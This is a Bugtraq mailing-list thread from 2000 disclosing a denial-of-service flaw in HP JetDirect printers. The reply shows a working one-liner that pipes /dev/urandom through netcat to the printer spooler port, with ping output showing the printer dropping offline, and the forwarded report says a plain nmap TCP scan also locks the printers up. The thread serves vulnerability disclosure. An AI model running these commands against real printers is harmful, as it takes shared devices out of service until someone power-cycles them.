Re: DOS attack against HP JetDirect Printers (fwd)

[john.bock () MARCHFIRST COM (John Bock)]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I've never seen nmap dos a HP4000 printer but they do die if you toss junk at
the spooler
port.  The printer display says 86.00x EIO 1 Error, and the red attention light
goes on.  At this
point you have to power the printer back on and off.  The rev's are the same as
yours (G.08.x)
so it should work for you. I think the other isssue is why are printers running
all these services?

 -John

# nmap -sT -PT 10.95.3.38

Starting nmap V. 2.30BETA20 by fyodor () insecure org ( www.insecure.org/nmap/ )
Interesting ports on  (10.95.3.38):
(The 1511 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
80/tcp     open        http
280/tcp    open        http-mgmt
515/tcp    open        printer
631/tcp    open        unknown
9100/tcp   open        jetdirect

Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds
# ping 10.95.3.38
PING 10.95.3.38 (10.95.3.38): 56 data bytes
64 bytes from 10.95.3.38: icmp_seq=0 ttl=57 time=23.976 ms
^C
- --- 10.95.3.38 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 23.976/23.976/23.976/0.000 ms

# cat /dev/urandom | nc 10.95.3.38 515
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ^X^C punt! (give it a few minutes)

# ping 10.95.3.38
PING 10.95.3.38 (10.95.3.38): 56 data bytes
^C
- --- 10.95.3.38 ping statistics ---
9 packets transmitted, 0 packets received, 100% packet loss

> -----Original Message-----
> From: Alfred Huger [mailto:ah () SECURITYFOCUS COM]
> Sent: Thursday, April 20, 2000 11:45 AM
> To: BUGTRAQ () SECURITYFOCUS COM
> Subject: DOS attack against HP JetDirect Printers (fwd)
>
>
> Alfred Huger
> VP of Engineering
> SecurityFocus.com
>
> ---------- Forwarded message ----------
> Date: Thu, 20 Apr 2000 13:08:47 +0200
> From: Paul Knowles <Paul.Knowles () unifr ch>
> To: vuldb () securityfocus com
> Cc: knowles () pexppc33 unifr ch
> Subject: DOS attack against HP JetDirect Printers
>
>
> Hello,
>
> In case anyone is interested, scanning HP printers with
> tools such as nmap will cause the printer to lock up hard.
> I discovered this while trying to diagnose a connection
> problem we were having with a printer.
> I've verified this with at least the following versions of
> JetDirect:
>
> Firmware Rev.   : A.08.06
> Firmware Rev.   : G.08.03
> Firmware Rev.   : G.07.17
> Firmware Rev.   : G.07.03
>
> I haven't been able to establish the exact communications
> causing the lockup; someone with more experience than I
> should check this out.
>
> Any network accessable printer can be put out of service
> with a simple nmap -sT -PT HP.printer.tcp.ip
> A power cycle is required for reset.
>
> My apologies if i have the wrong email address.
> (there is no Submit a Bug instructions on the securityfocus
> site).  HP have no bug reporting facilities either...
>
> thanks,
>
> Paul Knowles.
> email: Paul.Knowles () unifr ch
> finger me at pexppc33.unifr.ch for more contact information

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.3

iQA/AwUBOQC+FiwFkokFbeHBEQLOjQCcD0+J+v2Og2I6XqZx/xdOSKs/H38An1Ig
bYNBTvOdrBJxZNpwtPL4CNtH
=k1y4
-----END PGP SIGNATURE-----